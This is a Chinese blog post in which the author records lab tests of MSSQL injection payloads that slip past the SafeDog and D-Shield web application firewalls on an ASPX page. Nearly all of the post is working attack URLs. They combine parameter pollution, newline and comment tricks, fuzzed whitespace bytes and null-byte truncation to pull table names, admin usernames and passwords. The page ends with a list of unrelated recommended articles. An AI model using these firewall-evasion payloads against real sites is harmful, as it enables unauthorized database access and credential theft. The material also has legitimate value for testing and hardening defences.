ASPX Bypass 安全狗/D盾

4_21前言:之前只好好的学过mysql注入,最近想把mssql注入学一遍,顺便试试能否绕过安全狗/D盾

第一种:HPP参数污染 + 换行符%0a + msssql特性

初步绕过:

http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select user,'2','3'

.符号修饰绕过,下面的语句只能靠.来进行绕过

http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select table_name,'2','3' from (select table_name from.information_schema.tables where table_name != 'cmd')a

http://192.168.1.167/aspxmssql/sql.aspx?id=1e2union/*&id=*/--xxx%0a/**/all select(select top 2 table_name from.information_schema.tables where table_name != 'cmd'),'2','3';

第二种:注释符 + 单引号

关键词:--x%0a

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union--x%0aall(select table_name,'2','3' from information_schema.tables)

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union--x%0aall(select username,'2','3' from admin where id=1) //这里整形加上单引号才能绕过!

第三种:fuzz空白/填充符 + ALL/DISTINCT筛选

关键词:[0x00-0x20]

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union%01all select table_name,'2','3' from information_schema.tables

http://192.168.1.167/aspxmssql/sql.aspx?id=-1e-union%01all select password,'2','3' from admin where id=1

到了这里继续测试D盾,环境真糟糕,08r2的机器竟然无法安装D盾

第一种:HPP参数污染 + %00截断干扰 + 换行符

http://192.168.1.165/aspxmssql/sql.aspx/a.jsp?id=1e2%00%0aunion--%23&id=%00%0aall--%23&id=%00%0aselect @@version,'2','3'

出数据:http://192.168.1.165/aspxmssql/sql.aspx/a.jsp?id=1e2%00%0aunion--%23&id=%00%0aall--%23&id=%00%0a(select password,'2','3' from admin where id=1)

posted @   zpchcbd  阅读(238)  评论(0编辑  收藏  举报
编辑推荐:
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
阅读排行:
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
点击右上角即可分享
微信分享提示